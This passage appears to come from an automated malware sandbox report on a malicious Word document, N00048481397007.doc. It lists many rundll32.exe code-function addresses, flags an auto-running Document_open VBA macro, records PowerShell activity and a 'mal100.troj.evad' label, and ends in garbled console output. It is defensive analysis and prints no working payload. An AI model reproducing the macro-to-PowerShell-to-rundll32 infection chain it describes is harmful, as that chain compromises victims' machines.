                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02001DFE8_2_02001DFE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001CC0178_2_001CC017
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001D40128_2_001D4012
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001D06048_2_001D0604
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C9C3D8_2_001C9C3D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001DCA558_2_001DCA55
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001CC8518_2_001CC851
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001DBC4D8_2_001DBC4D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C98468_2_001C9846
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001DCC7F8_2_001DCC7F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C54788_2_001C5478
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001D44788_2_001D4478
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001CE2728_2_001CE272
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001D96658_2_001D9665
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C9A998_2_001C9A99
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001D34BF8_2_001D34BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001D90BE8_2_001D90BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001CB6B98_2_001CB6B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C2EAC8_2_001C2EAC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C70AD8_2_001C70AD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C28AA8_2_001C28AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001DC4A58_2_001DC4A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C6CA58_2_001C6CA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C92A38_2_001C92A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001CE8DD8_2_001CE8DD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001CB8D88_2_001CB8D8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001DA6D98_2_001DA6D9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001D9EDA8_2_001D9EDA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001D08CF8_2_001D08CF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001D34C38_2_001D34C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001D38C28_2_001D38C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001D14FC8_2_001D14FC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001D00FE8_2_001D00FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001D66FB8_2_001D66FB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C50F18_2_001C50F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C68EC8_2_001C68EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C30E88_2_001C30E8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001D891E8_2_001D891E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001D25158_2_001D2515
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001CB10A8_2_001CB10A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C43048_2_001C4304
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001DB7068_2_001DB706
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001DD1388_2_001DD138
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001D93338_2_001D9333
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001D71328_2_001D7132
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001CFF2C8_2_001CFF2C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001CEF2E8_2_001CEF2E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001CF52E8_2_001CF52E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001D3D298_2_001D3D29
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C35238_2_001C3523
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001CA3238_2_001CA323
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001D61588_2_001D6158
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001DC15B8_2_001DC15B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001CEB548_2_001CEB54
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C23538_2_001C2353
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C4D488_2_001C4D48
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C177C8_2_001C177C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001D21798_2_001D2179
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C0D7A8_2_001C0D7A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C2B708_2_001C2B70
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001D13728_2_001D1372
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001DB1658_2_001DB165
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C5D638_2_001C5D63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001D819F8_2_001D819F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C9D958_2_001C9D95
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001CF7978_2_001CF797
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001CF7938_2_001CF793
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C498C8_2_001C498C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C598B8_2_001C598B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001CDB868_2_001CDB86
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C19838_2_001C1983
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C3DB88_2_001C3DB8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001CD5B88_2_001CD5B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001D41AB8_2_001D41AB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001D1BA58_2_001D1BA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001D7FA78_2_001D7FA7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001DC5A18_2_001DC5A1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001CD3F58_2_001CD3F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C27F38_2_001C27F3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001CB3E88_2_001CB3E8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001CFBE68_2_001CFBE6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0202303C8_2_0202303C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_020187D08_2_020187D0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02031E148_2_02031E14
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001B40129_2_001B4012
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001AC0179_2_001AC017
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001B06049_2_001B0604
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A9C3D9_2_001A9C3D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001AC8519_2_001AC851
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001BCA559_2_001BCA55
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001BBC4D9_2_001BBC4D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A98469_2_001A9846
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A54789_2_001A5478
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001B44789_2_001B4478
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001BCC7F9_2_001BCC7F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001AE2729_2_001AE272
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001B96659_2_001B9665
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A9A999_2_001A9A99
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001AB6B99_2_001AB6B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001B34BF9_2_001B34BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001B90BE9_2_001B90BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A28AA9_2_001A28AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A2EAC9_2_001A2EAC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A70AD9_2_001A70AD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A92A39_2_001A92A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001BC4A59_2_001BC4A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A6CA59_2_001A6CA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001B9EDA9_2_001B9EDA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001AB8D89_2_001AB8D8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001BA6D99_2_001BA6D9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001AE8DD9_2_001AE8DD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001B08CF9_2_001B08CF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001B34C39_2_001B34C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001B38C29_2_001B38C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001B66FB9_2_001B66FB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001B00FE9_2_001B00FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001B14FC9_2_001B14FC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A50F19_2_001A50F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A30E89_2_001A30E8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A68EC9_2_001A68EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001B891E9_2_001B891E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001B25159_2_001B2515
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001AB10A9_2_001AB10A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001BB7069_2_001BB706
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A43049_2_001A4304
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001BD1389_2_001BD138
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001B93339_2_001B9333
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001B71329_2_001B7132
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001B3D299_2_001B3D29
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001AEF2E9_2_001AEF2E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001AF52E9_2_001AF52E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001AFF2C9_2_001AFF2C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A35239_2_001A3523
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001AA3239_2_001AA323
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001BC15B9_2_001BC15B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001B61589_2_001B6158
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A23539_2_001A2353
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001AEB549_2_001AEB54
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A4D489_2_001A4D48
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A0D7A9_2_001A0D7A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001B21799_2_001B2179
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A177C9_2_001A177C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001B13729_2_001B1372
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A2B709_2_001A2B70
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A5D639_2_001A5D63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001BB1659_2_001BB165
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001B819F9_2_001B819F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001AF7939_2_001AF793
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001AF7979_2_001AF797
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A9D959_2_001A9D95
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A598B9_2_001A598B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A498C9_2_001A498C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A19839_2_001A1983
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001ADB869_2_001ADB86
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A3DB89_2_001A3DB8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001AD5B89_2_001AD5B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001B41AB9_2_001B41AB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001BC5A19_2_001BC5A1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001B7FA79_2_001B7FA7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001B1BA59_2_001B1BA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A27F39_2_001A27F3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001AD3F59_2_001AD3F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001AB3E89_2_001AB3E8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001AFBE69_2_001AFBE6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0059C85110_2_0059C851
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_005ACA5510_2_005ACA55
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_005ABC4D10_2_005ABC4D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0059984610_2_00599846
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0059547810_2_00595478
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_005A447810_2_005A4478
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_005ACC7F10_2_005ACC7F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0059E27210_2_0059E272
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_005A966510_2_005A9665
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_005A401210_2_005A4012
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0059C01710_2_0059C017
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_005A060410_2_005A0604
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00599C3D10_2_00599C3D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_005A9EDA10_2_005A9EDA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0059B8D810_2_0059B8D8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_005AA6D910_2_005AA6D9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0059E8DD10_2_0059E8DD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_005A08CF10_2_005A08CF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_005A38C210_2_005A38C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_005A34C310_2_005A34C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_005A66FB10_2_005A66FB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_005A00FE10_2_005A00FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_005A14FC10_2_005A14FC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_005950F110_2_005950F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_005930E810_2_005930E8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_005968EC10_2_005968EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00599A9910_2_00599A99
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0059B6B910_2_0059B6B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_005A90BE10_2_005A90BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_005A34BF10_2_005A34BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_005928AA10_2_005928AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_005970AD10_2_005970AD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00592EAC10_2_00592EAC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_005992A310_2_005992A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00596CA510_2_00596CA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_005AC4A510_2_005AC4A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_005AC15B10_2_005AC15B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_005A615810_2_005A6158
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0059235310_2_00592353
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0059EB5410_2_0059EB54
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00594D4810_2_00594D48
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00590D7A10_2_00590D7A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_005A217910_2_005A2179
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0059177C10_2_0059177C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_005A137210_2_005A1372
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00592B7010_2_00592B70
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00595D6310_2_00595D63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_005AB16510_2_005AB165
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_005A891E10_2_005A891E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_005A251510_2_005A2515
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0059B10A10_2_0059B10A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_005AB70610_2_005AB706
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0059430410_2_00594304
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_005AD13810_2_005AD138
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_005A713210_2_005A7132
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_005A933310_2_005A9333
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_005A3D2910_2_005A3D29
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0059FF2C10_2_0059FF2C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0059EF2E10_2_0059EF2E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0059F52E10_2_0059F52E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0059352310_2_00593523
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0059A32310_2_0059A323
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_005927F310_2_005927F3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0059D3F510_2_0059D3F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0059B3E810_2_0059B3E8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0059FBE610_2_0059FBE6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_005A819F10_2_005A819F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0059F79310_2_0059F793
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00599D9510_2_00599D95
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0059F79710_2_0059F797
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0059598B10_2_0059598B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0059498C10_2_0059498C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0059198310_2_00591983
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0059DB8610_2_0059DB86
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00593DB810_2_00593DB8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0059D5B810_2_0059D5B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_005A41AB10_2_005A41AB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_005AC5A110_2_005AC5A1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_005A7FA710_2_005A7FA7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_005A1BA510_2_005A1BA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0040641711_2_00406417
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0041A0F111_2_0041A0F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0040484411_2_00404844
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0040E04411_2_0040E044
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0041525011_2_00415250
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0041067211_2_00410672
                      Source: N00048481397007.docOLE, VBA macro line: Private Sub Document_open()
                      Source: VBA code instrumentationOLE, VBA macro: Module U765y5vgf_ao0faq, Function Document_openName: Document_open
                      Source: N00048481397007.docOLE indicator, VBA macros: true
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 00428000 appears 45 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 0045B890 appears 50 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 00439898 appears 50 times
                      Source: powershell.exe, 00000005.00000002.2093609433.000000001CED0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2091212034.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2088276083.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091319126.0000000001C10000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
                      Source: classification engineClassification label: mal100.troj.evad.winDOC@38/12@6/5
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$0048481397007.docJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRBA0B.tmpJump to behavior
                      Source: N00048481397007.docOLE indicator, Word Document stream: true
                      Source: N00048481397007.docOLE document summary: edited time not present or 0
                      Source: C:\Windows\System32\msg.exeConsole Write: ........................................ .......................0.!.......!.............#...............................h.......5kU.......!.....Jump to behavior
                      Source: C:\Windows\System32\msg.exeConsole Write: ................................A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e.........!.....L.................!.....Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................................................`I.........v.....................K........q.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................u.............}..v............0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j..... u...............u.............}..v....H.......0.................q.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................u.............}..v............0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......q...............u.............}..v............0...............8.q.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#..................j......................u.............}..v....H.......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#..................j..... u...............u.............}..v............0.................q.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....7...............+..j.....Jq...............u.............}..v....hm......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....7..................j.... n................u.............}..v.....n......0................Gq.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C...............+..j.....Jq...............u.............}..v....hu......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C..................j.... v................u.............}..v.....v......0................Gq.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O...............+..j.....Jq...............u.............}..v....h}......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O..................j.... ~................u.............}..v.....~......0................Gq.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v............0...............XGq.....(.......................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[..................j....p.................u.............}..v............0................Gq.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9.5.............}..v............0...............XGq.....$.......................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g..................j......................u.............}..v....8.......0................Gq.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s...............+..j.....Jq...............u.............}..v............0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s..................j......................u.............}..v....8.......0................Gq.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................+..j.....Jq...............u.............}..v............0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................u.............}..v....8.......0................Gq.............................Jump to behavior
